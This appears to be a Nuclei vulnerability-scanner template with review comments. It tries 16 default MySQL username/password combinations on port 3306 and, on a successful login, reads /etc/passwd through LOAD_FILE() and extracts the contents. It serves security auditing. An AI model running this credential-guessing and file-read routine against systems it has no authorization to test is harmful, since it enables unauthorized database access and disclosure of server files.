id : mysql-load-file
info :
name : MySQL LOAD_FILE - Enable
author : pussycat0x
severity : high
description : |
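The LOAD_FILE() function in MySQL reads a file on the database server and returns its contents as a string, which makes it dangerous when its use is not restricted (for example, through the FILE privilege and the secure_file_priv setting). Any account that can log in and is allowed to call it can disclose files readable by the MySQL server process through an ordinary query. This template reports a host when a login with one of the listed default credentials succeeds and LOAD_FILE('/etc/passwd') returns the file's contents.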
reference :
# NOTE(review): this link documents Nmap's mysql-databases script, not LOAD_FILE;
# a reference to the MySQL manual entry for LOAD_FILE() would fit this check better.
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata :
verified : true
max-request : 16
shodan-query : "port:3306"
tags : js,mysql,network,audit
javascript :
# The pre-condition gates the code below on isPortOpen(Host,Port), so no login
# is attempted against a target whose MySQL port is not reachable.
- pre-condition : |
isPortOpen(Host,Port);
code : |
// Load nuclei's MySQL helper module and create a client from it.
let m = require('nuclei/mysql');
let c = m.MySQLClient();
// Host, Port, User, Pass and Query are bound by the template's args section;
// with the clusterbomb payloads this call runs once per username/password pair.
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
Export(response);
# Values bound to the identifiers used in the JavaScript code.
args :
Host : "{{Host}}"
# Fixed to the default MySQL port; instances listening on another port are not
# checked by this template.
Port : "3306"
# /etc/passwd is used as the proof-of-read file. This assumes a Unix-like
# server; a host without that path will not match even if LOAD_FILE is usable.
Query : SELECT LOAD_FILE('/etc/passwd')
# User and Pass are filled from the payload lists declared below.
User : "{{usernames}}"
Pass : "{{passwords}}"
payloads :
usernames :
- root
- admin
- mysql
- test
passwords :
- root
- admin
- mysql
- test
# clusterbomb tries every username/password combination: 4 x 4 = 16 login
# attempts per host, which is the max-request value declared in the metadata.
# On the server side these will typically show up as a burst of failed
# authentications from the scanner's address.
attack : clusterbomb
# Stop trying further credential pairs against a host once one pair matches.
stop-at-first-match : true
# Both matchers must hold for a finding: the script run reported success and
# the output contains a passwd-style root entry.
matchers-condition : and
matchers :
- type : dsl
dsl :
- success == true
- type : word
words :
# "root:x:" is how the root line of a shadowed /etc/passwd begins, so a hit
# shows the file content was actually returned rather than NULL or an error.
- "root:x:"
# The extractor copies the returned rows, i.e. the contents of the file that
# was read, into the scan result; handle and store scan output accordingly.
extractors :
- type : json
part : response
json :
- .Rows[]
# digest: 4b0a00483046022100abcc3dba9d8ad8d8b9814f9a26fa4c4a2e3092998c466b6b92f7f9899a738e40022100f9ac346fa40811738f00b7966e7a747efb702ef048072946b4b037fae8d9633b:922c64590222798bb761d5b6d8e72950